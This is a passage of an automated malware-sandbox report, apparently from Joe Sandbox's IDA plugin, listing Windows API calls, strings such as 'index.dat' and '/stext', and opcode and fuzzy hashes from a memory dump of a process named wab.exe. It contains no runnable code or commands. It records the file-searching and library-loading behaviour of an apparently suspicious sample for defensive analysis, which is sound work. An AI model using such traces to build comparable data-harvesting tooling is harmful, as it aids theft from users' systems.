                                                              • API ID: ErrorLast$File$PointerRead
                                                              • String ID:
                                                              • API String ID: 839530781-0
                                                              • Opcode ID: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                              • Instruction ID: c9208e3d43fc8ff2949f7201360c8f82def2114e122364bdeb0a9035ecfb973e
                                                              • Opcode Fuzzy Hash: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                              • Instruction Fuzzy Hash: D001A236208204BBEB008F69DC45BDA3B78FB153B4F100427F908C6640E275D89096EA
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: FileFindFirst
                                                              • String ID: *.*$index.dat
                                                              • API String ID: 1974802433-2863569691
                                                              • Opcode ID: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                              • Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
                                                              • Opcode Fuzzy Hash: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                              • Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: ??3@mallocmemcpy
                                                              • String ID:
                                                              • API String ID: 3831604043-0
                                                              • Opcode ID: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                                                              • Instruction ID: 1240433d41d023da9ba75aa62d017d874606d7cfbee4c78203c9aa8101697722
                                                              • Opcode Fuzzy Hash: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                                                              • Instruction Fuzzy Hash: 88F0E9727092219FC708AE75A98180BB79DAF55314B12482FF404E3282D7389C50CB58
                                                              APIs
                                                              • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                              • GetLastError.KERNEL32 ref: 004175A2
                                                              • GetLastError.KERNEL32 ref: 004175A8
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast$FilePointer
                                                              • String ID:
                                                              • API String ID: 1156039329-0
                                                              • Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                              • Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
                                                              • Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                              • Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8
                                                              APIs
                                                              • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                              • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                              • FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                              Similarity
                                                              • API ID: File$ChangeCloseCreateFindNotificationTime
                                                              • String ID:
                                                              • API String ID: 1631957507-0
                                                              • Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                              • Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
                                                              • Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                              • Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665
                                                              APIs
                                                              • GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                              • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                              • GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                              Similarity
                                                              • API ID: Temp$DirectoryFileNamePathWindows
                                                              • String ID:
                                                              • API String ID: 1125800050-0
                                                              • Opcode ID: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                              • Instruction ID: b144c37017a21c6b5a3d1d2b3cfc872714830df517851edcd0bc871ed666fd71
                                                              • Opcode Fuzzy Hash: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                              • Instruction Fuzzy Hash: ACE0927A500218A7DB109B61DC4DFC777BCFB45304F0001B1B945E2161EB349A848BA8
                                                              Similarity
                                                              • API ID:
                                                              • String ID: d
                                                              • API String ID: 0-2564639436
                                                              • Opcode ID: 9081757c99ca3a842b21ef208fcf0aba28da60ac56b45099a1a2f4719e1e1e22
                                                              • Instruction ID: 98c7df9677761670a5e344a1c7628a8b006f0a2246df1cf6f5c5c4488f8f87fd
                                                              • Opcode Fuzzy Hash: 9081757c99ca3a842b21ef208fcf0aba28da60ac56b45099a1a2f4719e1e1e22
                                                              • Instruction Fuzzy Hash: 4591ABB0508302AFDB20DF19D88196FBBE4BF88358F50192FF88497251D778D985CB9A
                                                              Similarity
                                                              • API ID: memset
                                                              • String ID: BINARY
                                                              • API String ID: 2221118986-907554435
                                                              • Opcode ID: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                                                              • Instruction ID: 089a0534c11c2c8a1092ab46fa13594887108ded84822111f9e073e703b485f9
                                                              • Opcode Fuzzy Hash: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                                                              • Instruction Fuzzy Hash: 41518B71A047059FDB21CF69C881BEA7BE4EF48350F14446AF849CB342E738D995CBA9
                                                              APIs
                                                                • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT ref: 0040ECF9
                                                                • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT ref: 0040EDC0
                                                              • GetStdHandle.KERNEL32(000000F5), ref: 00410530
                                                              • FindCloseChangeNotification.KERNELBASE(?), ref: 00410654
                                                                • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                • Part of subcall function 0040973C: GetLastError.KERNEL32 ref: 00409750
                                                                • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                                                                • Part of subcall function 0040973C: MessageBoxW.USER32(?,?,Error,00000030), ref: 00409796
                                                              Similarity
                                                              • API ID: ??2@??3@ChangeCloseCreateErrorFileFindHandleLastMessageNotification_snwprintf
                                                              • String ID:
                                                              • API String ID: 1161345128-0
                                                              • Opcode ID: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                                              • Instruction ID: c777e68e994987bb064ab7fb99de871126f79ef1b866bcb434911d427814d160
                                                              • Opcode Fuzzy Hash: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                                              • Instruction Fuzzy Hash: BE417231A00204EFCB25AF65C885A9E77B6EF84711F20446FF446A7291C7B99EC0DE59
                                                              Similarity
                                                              • API ID: _wcsicmp
                                                              • String ID: /stext
                                                              • API String ID: 2081463915-3817206916
                                                              • Opcode ID: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                              • Instruction ID: 10e6e7fbaeb1b3fbdbf907bfc38f809d5841ace5bac79d7196eddb000c1bc607
                                                              • Opcode Fuzzy Hash: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                              • Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95
                                                              APIs
                                                                • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                              • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                                                                • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                                                              • FindCloseChangeNotification.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT ref: 0040B052
                                                              Similarity
                                                              • API ID: File$ByteCharMultiWide$??2@??3@ChangeCloseCreateFindNotificationReadSize
                                                              • String ID:
                                                              • API String ID: 159017214-0
                                                              • Opcode ID: 5551154f09d9ac0fe1cac7a20b9391cb02a4855cbb9d966ae120c46d578013b8
                                                              • Instruction ID: dc8783d9a6c7baf78a377756874cfbd60b78407a6d3acdf6d1052ad5173bbb79
                                                              • Opcode Fuzzy Hash: 5551154f09d9ac0fe1cac7a20b9391cb02a4855cbb9d966ae120c46d578013b8
                                                              • Instruction Fuzzy Hash: 91118275804208AFDB10AF6ADC45C8A7F75FF01364711C27AF525A72A1D6349A18CBA5
                                                              Strings
                                                              • failed to allocate %u bytes of memory, xrefs: 004152F0
                                                              Similarity
                                                              • API ID: malloc
                                                              • String ID: failed to allocate %u bytes of memory
                                                              • API String ID: 2803490479-1168259600
                                                              • Opcode ID: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                                              • Instruction ID: 101c51dc2fc609bd9d1e0073b1fda66f00508c6688545faad3e4fa21ce9dc4bd
                                                              • Opcode Fuzzy Hash: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                                              • Instruction Fuzzy Hash: 11E0DFB7B02A12A3C200561AED01AC667959FC122572B013BF92CD3681E638D89687A9
                                                              Similarity
                                                              • API ID: ??3@
                                                              • String ID:
                                                              • API String ID: 613200358-0
                                                              • Opcode ID: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                              • Instruction ID: 7f33cc2486ffea160e999b9abaf125df84647c5341351ad01334bd221cd3bada
                                                              • Opcode Fuzzy Hash: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                              • Instruction Fuzzy Hash: 32D042B0404B008ED7B0DF39D401602BBF0AB093143118D2E90AAC2A50E775A0149F08
                                                              Similarity
                                                              • API ID: memcmpmemset
                                                              • String ID:
                                                              • API String ID: 1065087418-0
                                                              • Opcode ID: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                              • Instruction ID: cf105cae5e27f97c9cd1c3f46a8d5e16e2707a712041142e317bfb3d1f631299
                                                              • Opcode Fuzzy Hash: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                              • Instruction Fuzzy Hash: 2A615B71A01349EBDB14EFA495815EEB7B4EB04308F1440AFE609D3241E738AED4DB99
                                                              APIs
                                                                • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                                                                • Part of subcall function 0040A02C: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                • Part of subcall function 0040A02C: FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                              • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                                                              Similarity
                                                              • API ID: File$Time$ChangeCloseCompareCreateFindNotificationmemset
                                                              • String ID:
                                                              • API String ID: 1481295809-0
                                                              • Opcode ID: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                              • Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
                                                              • Opcode Fuzzy Hash: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                              • Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95
                                                              APIs
                                                                • Part of subcall function 004135E0: FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                              • GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                              Similarity
                                                              • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                              • String ID:
                                                              • API String ID: 3150196962-0
                                                              • Opcode ID: 102e9bd218bff8034664a90f9159d5d227e7736aeb8d0cece17e8d9bf5f2cb6a
                                                              • Instruction ID: 35a9ad0fe6b4507ee66bae46934dcfd2e139bf0842d10804986ce3ee8b034d80
                                                              • Opcode Fuzzy Hash: 102e9bd218bff8034664a90f9159d5d227e7736aeb8d0cece17e8d9bf5f2cb6a
                                                              • Instruction Fuzzy Hash: BBF0A4311447126AE6306B7AAC02BE762849F00725F10862EB425D55D1EFA8D5C046AC
                                                              APIs
                                                              • SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                                • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                              Similarity
                                                              • API ID: File$PointerRead
                                                              • String ID:
                                                              • API String ID: 3154509469-0
                                                              • Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                              • Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
                                                              • Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                              • Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25
                                                              APIs
                                                              • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                                                                • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                                                                • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                                                                • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                                                              Similarity
                                                              • API ID: PrivateProfile$StringWrite_itowmemset
                                                              • String ID:
                                                              • API String ID: 4232544981-0
                                                              • Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                              • Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
                                                              • Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                              • Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59
                                                              APIs
                                                              • FreeLibrary.KERNELBASE(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                                                              Similarity
                                                              • API ID: FreeLibrary
                                                              • String ID:
                                                              • API String ID: 3664257935-0
                                                              • Opcode ID: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                              • Instruction ID: 9043d1e372537a54137ae43dcd20834ee918eeaa55a47e8e1dedab4d47514996
                                                              • Opcode Fuzzy Hash: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                              • Instruction Fuzzy Hash: E2E0F6B5900B018FD3708F1BE944406FBF8BFE56113108A1FD4AAC2A24D7B4A1898F54
                                                              APIs
                                                                • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                              • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                                                              Similarity
                                                              • API ID: AddressProc$FileModuleName
                                                              • String ID:
                                                              • API String ID: 3859505661-0
                                                              • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                              • Instruction ID: eb737a8a997ed41d0f7a348c178ce8d4b8225706e43eb580f21eee6dbde26bc7
                                                              • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                              • Instruction Fuzzy Hash: 6FD02231B083007BEA20EE70CC00FCBA2F47F40F12F008C5AB191D2080C374C9495305
                                                              APIs
                                                              • ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                              Similarity
                                                              • API ID: FileRead
                                                              • String ID:
                                                              • API String ID: 2738559852-0
                                                              • Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                              • Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
                                                              • Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                              • Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55
                                                              APIs
                                                              • WriteFile.KERNELBASE(?,00000009,?,00000000,00000000,?,?,00402F9B,?,00000000,00000000,00000000,0000017E), ref: 0040A325
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: FileWrite
                                                              • String ID:
                                                              • API String ID: 3934441357-0
                                                              • Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                              • Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
                                                              • Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                              • Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94
                                                              APIs
                                                              • FreeLibrary.KERNELBASE(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: FreeLibrary
                                                              • String ID:
                                                              • API String ID: 3664257935-0
                                                              • Opcode ID: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                              • Instruction ID: 8f6381f957debc367d4a0444659be52de1bfd3a154b3998764173f6a98a011bd
                                                              • Opcode Fuzzy Hash: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                              • Instruction Fuzzy Hash: 1DD0C9765002229BDB10AF26EC057857378FF00712B110425E810B7594D778BEE68ADC
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: ??3@
                                                              • String ID:
                                                              • API String ID: 613200358-0
                                                              • Opcode ID: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                                              • Instruction ID: 84c58710a9e867f17c2d1ed9f7495b278bdfae561cd9e9721482330d0bfefd66
                                                              • Opcode Fuzzy Hash: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                                              • Instruction Fuzzy Hash: 48C00272510B018FEB209E16C405762B3E4AF5173BF928C1D949591481D77CE4448A1D
                                                              APIs
                                                              • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: CreateFile
                                                              • String ID:
                                                              • API String ID: 823142352-0
                                                              • Opcode ID: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                              • Instruction ID: 15e4bfb1af8ab284213ec8af4af1ca3ed9a3c322684c6da9746693c795416a08
                                                              • Opcode Fuzzy Hash: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                              • Instruction Fuzzy Hash: A8C092B0280200BEFE224B10EC15F36755CE744700F2008247E40F40E0C1605E108524
                                                              APIs
                                                              • CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: CreateFile
                                                              • String ID:
                                                              • API String ID: 823142352-0
                                                              • Opcode ID: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                              • Instruction ID: 13aef0f41518da9c32968a96bed17b980f0e8f352a8d1793a660c4ee04e7d177
                                                              • Opcode Fuzzy Hash: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                              • Instruction Fuzzy Hash: B8C012F02903007EFF204B10AC0AF37755DF784700F2048207E40F40E1C2B15C008524
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: ??3@
                                                              • String ID:
                                                              • API String ID: 613200358-0
                                                              • Opcode ID: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                              • Instruction ID: 146ea39d6618054f0b1de7ea1636ea0e57db3b52e0d7afa8327ef8e2ad9437d0
                                                              • Opcode Fuzzy Hash: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                              • Instruction Fuzzy Hash: 18C012B29107018BFB308E15C409322B2E4AF0072BFA18C0D9090910C2C77CD080CA18
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: ??3@
                                                              • String ID:
                                                              • API String ID: 613200358-0
                                                              • Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                              • Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
                                                              • Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                              • Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518
                                                              APIs
                                                              • FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: FreeLibrary
                                                              • String ID:
                                                              • API String ID: 3664257935-0
                                                              • Opcode ID: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                              • Instruction ID: 97b2006ec1e2dd28fddd19cbcf35086f2a6b1d7d6d8af37d8808782836c913ed
                                                              • Opcode Fuzzy Hash: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                              • Instruction Fuzzy Hash: C1C04C355107129BE7318F22C849793B3E8BB00767F40C818A56A85454D7BCE594CE28
                                                              APIs
                                                              • EnumResourceNamesW.KERNELBASE(?,?,Function_000148B6,00000000), ref: 0041494B
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: EnumNamesResource
                                                              • String ID:
                                                              • API String ID: 3334572018-0
                                                              • Opcode ID: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                              • Instruction ID: 4cd0fc1a45efe5f4a77ff86a676eea9814a6d41529a344ef69fdb726e0e13cac
                                                              • Opcode Fuzzy Hash: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                              • Instruction Fuzzy Hash: 5CC09B355943819FD711DF108C05F1A76D5BF95705F104C397151940A0C7614014A60A
                                                              APIs
                                                              • FreeLibrary.KERNELBASE(?), ref: 0044DEB6
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: FreeLibrary
                                                              • String ID:
                                                              • API String ID: 3664257935-0
                                                              • Opcode ID: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                              • Instruction ID: c12df66a07a312a107e4de7a98dbd39cb061029a89fa16cd2619b088cce9516a
                                                              • Opcode Fuzzy Hash: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                              • Instruction Fuzzy Hash: 95C04C35D10311ABFB31AB11ED4975232A5BB00717F52006494128D065D7B8E454CB2D
                                                              APIs
                                                              • FindClose.KERNELBASE(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2266701375.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: CloseFind
                                                              • String ID:
                                                              • API String ID: 1863332320-0
                                                              • Opcode ID: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                              • Instruction ID: 0a5868f0c47a417661f40efe111cada53839b745ef6d73ffe26d621af3302058
                                                              • Opcode Fuzzy Hash: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                              • Instruction Fuzzy Hash: 06C092341506058BD62C5F38DC9A42A77A0BF4A3303B40F6CA0F3D24F0E73888538A04
                                                              APIs
